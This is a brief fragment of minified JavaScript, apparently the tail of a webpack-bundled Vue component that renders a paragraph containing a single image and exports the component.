"),e("p",[e("img",{attrs:{src:a(1039),alt:"img"}})])],1)}),[],!1,null,null,null);t.default=r.exports}}]);```
